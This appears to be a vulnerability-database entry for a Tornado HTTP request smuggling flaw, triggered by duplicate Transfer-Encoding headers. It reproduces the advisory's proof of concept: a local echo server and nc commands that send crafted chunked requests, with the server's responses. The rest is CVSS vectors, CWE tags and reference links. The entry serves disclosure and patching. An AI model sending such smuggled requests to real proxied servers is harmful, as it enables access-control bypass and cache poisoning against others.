Search for vulnerabilities
Vulnerability details: VCID-c5mu-8egy-aaae
Vulnerability ID VCID-c5mu-8egy-aaae
Aliases GHSA-753j-mpmx-qq6g
Summary Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') in tornado ### Summary When Tornado receives a request with two `Transfer-Encoding: chunked` headers, it ignores them both. This enables request smuggling when Tornado is deployed behind a proxy server that emits such requests. [Pound](https://en.wikipedia.org/wiki/Pound_(networking)) does this. ### PoC 0. Install Tornado. 1. Start a simple Tornado server that echoes each received request's body: ```bash cat << EOF > server.py import asyncio import tornado class MainHandler(tornado.web.RequestHandler): def post(self): self.write(self.request.body) async def main(): tornado.web.Application([(r"/", MainHandler)]).listen(8000) await asyncio.Event().wait() asyncio.run(main()) EOF python3 server.py & ``` 2. Send a valid chunked request: ```bash printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n' | nc localhost 8000 ``` 3. Observe that the response is as expected: ``` HTTP/1.1 200 OK Server: TornadoServer/6.3.3 Content-Type: text/html; charset=UTF-8 Date: Sat, 07 Oct 2023 17:32:05 GMT Content-Length: 1 Z ``` 4. Send a request with two `Transfer-Encoding: chunked` headers: ``` printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n' | nc localhost 8000 ``` 5. Observe the strange response: ``` HTTP/1.1 200 OK Server: TornadoServer/6.3.3 Content-Type: text/html; charset=UTF-8 Date: Sat, 07 Oct 2023 17:35:40 GMT Content-Length: 0 HTTP/1.1 400 Bad Request ``` This is because Tornado believes that the request has no message body, so it tries to interpret `1\r\nZ\r\n0\r\n\r\n` as its own request, which causes a 400 response. With a little cleverness involving `chunk-ext`s, you can get Tornado to instead respond 405, which has the potential to desynchronize the connection, as opposed to 400 which should always result in a connection closure. ### Impact Anyone using Tornado behind a proxy that forwards requests containing multiple `Transfer-Encoding: chunked` headers is vulnerable to request smuggling, which may entail ACL bypass, cache poisoning, or connection desynchronization.
Status Published
Exploitability 0.5
Weighted Severity 6.2
Risk 3.1
Affected and Fixed Packages Package Details
Weaknesses (3)
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CWE-937 OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities
CWE-1035 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
System Score Found at
cvssv3.1_qr MODERATE https://github.com/advisories/GHSA-753j-mpmx-qq6g
cvssv3.1 6.1 https://github.com/tornadoweb/tornado
generic_textual MODERATE https://github.com/tornadoweb/tornado
cvssv3.1 5.3 https://github.com/tornadoweb/tornado/commit/d65f6e71a77f53a1ff0a0dc55704be13f04eb572
generic_textual MODERATE https://github.com/tornadoweb/tornado/commit/d65f6e71a77f53a1ff0a0dc55704be13f04eb572
cvssv3.1 5.3 https://github.com/tornadoweb/tornado/security/advisories/GHSA-753j-mpmx-qq6g
generic_textual MODERATE https://github.com/tornadoweb/tornado/security/advisories/GHSA-753j-mpmx-qq6g
Reference id Reference type URL
https://github.com/tornadoweb/tornado
https://github.com/tornadoweb/tornado/commit/d65f6e71a77f53a1ff0a0dc55704be13f04eb572
https://github.com/tornadoweb/tornado/security/advisories/GHSA-753j-mpmx-qq6g
GHSA-753j-mpmx-qq6g https://github.com/advisories/GHSA-753j-mpmx-qq6g
No exploits are available.
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at https://github.com/tornadoweb/tornado
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N Found at https://github.com/tornadoweb/tornado/commit/d65f6e71a77f53a1ff0a0dc55704be13f04eb572
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N Found at https://github.com/tornadoweb/tornado/security/advisories/GHSA-753j-mpmx-qq6g
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

No EPSS data available for this vulnerability.

Date Actor Action Source VulnerableCode Version
2024-06-07T00:39:23.957560+00:00 GithubOSV Importer Import https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-753j-mpmx-qq6g/GHSA-753j-mpmx-qq6g.json 34.0.0rc4